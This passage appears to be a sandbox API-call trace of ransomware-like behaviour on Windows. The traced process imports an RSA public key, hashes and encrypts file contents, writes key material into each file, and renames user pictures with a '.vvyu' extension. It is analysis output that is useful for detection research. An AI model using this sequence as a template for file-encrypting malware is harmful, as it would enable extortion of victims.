KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.982] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.983] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.983] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.983] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.983] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.983] GetLastError () returned 0x0 [0199.983] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.983] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.983] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.984] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.984] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7f40) returned 0x2ea99b0 [0199.984] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f780 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f7c8 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.985] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0199.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3290 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3278 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0199.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.988] GetCurrentThreadId () returned 0x66c [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7c08 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.989] GetCurrentThreadId () returned 0x66c [0199.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0199.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3290 [0199.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32f0 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3308 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32a8 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3278 [0199.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0199.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f7c8 | out: hHeap=0x620000) returned 1 [0199.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.001] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x7f33, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x7f33, lpOverlapped=0x0) returned 1 [0200.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.002] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x7f38, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.002] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0200.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0200.003] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.004] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.004] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.004] CloseHandle (hObject=0x510) returned 1 [0200.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0200.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.006] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\uo7bfSHfyn-0X-MGd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\uo7bfshfyn-0x-mgd.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\uo7bfSHfyn-0X-MGd.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\uo7bfshfyn-0x-mgd.bmp.vvyu")) returned 1 [0200.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.007] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0200.010] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713be870, ftCreationTime.dwHighDateTime=0x1d897a1, ftLastAccessTime.dwLowDateTime=0x7c52a6f0, ftLastAccessTime.dwHighDateTime=0x1d89840, ftLastWriteTime.dwLowDateTime=0x7c52a6f0, ftLastWriteTime.dwHighDateTime=0x1d89840, nFileSizeHigh=0x0, nFileSizeLow=0x2998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YdXrJd.png", cAlternateFileName="")) returned 1 [0200.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0200.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91710 [0200.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0200.011] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\YdXrJd.png") returned=".png" [0200.011] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\YdXrJd.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\ydxrjd.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.011] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=10648) returned 1 [0200.011] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.014] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x2972, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.014] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.017] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.017] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x2998, lpOverlapped=0x0) returned 1 [0200.018] lstrlenA (lpString="-----BEGIN PUBLIC 